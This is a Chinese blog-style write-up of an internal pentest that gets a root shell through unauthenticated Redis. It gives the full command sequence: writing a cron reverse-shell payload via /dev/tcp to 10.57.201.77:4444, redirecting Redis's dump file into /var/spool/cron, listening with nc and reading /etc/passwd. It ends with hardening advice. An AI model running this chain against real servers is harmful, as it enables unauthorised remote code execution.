Redis未授权访问导致getshell

redis未授权访问导致getshell-记录

1. 背景

公司内网危险端口扫描时,发现大量6379开放。redis服务默认端口6379(脑子里要有这个条件反射)。于是有了此文章利用记录。

2. 发现与利用

利用对象:192.168.6.38
漏洞利用:redis未授权访问漏洞
流程:
A、telnet 192.168.6.38 6379 尝试端口通不通
B、使用redis-cli工具连接测试存在未授权访问漏洞
连接reids
C、利用redis中set命令写入一下命令:
1、set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.57.201.77/4444 0>&1\n\n"
2、config set dir /var/spool/cron
3、config set dbfilename root
4、save
如下图:
redis命令写入
D、使用kali linux(10.57.201.77)接受shell
nc -lvnp 4444
如下图
在这里插入图片描述
E、查找主机负责人
cat /etc/passwd
查看公司那些人登陆过此主机,联系责任人整改;

查看passwd

3. 处置建议:

	a、为 Redis 添加密码验证(重启redis才能生效)
    修改 redis.conf 文件,添加 requirepass mypassword
  (注意redis不要用-a参数,明文输入密码,连接后使用auth认证)
	b、限制可连接Redis服务器的IP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值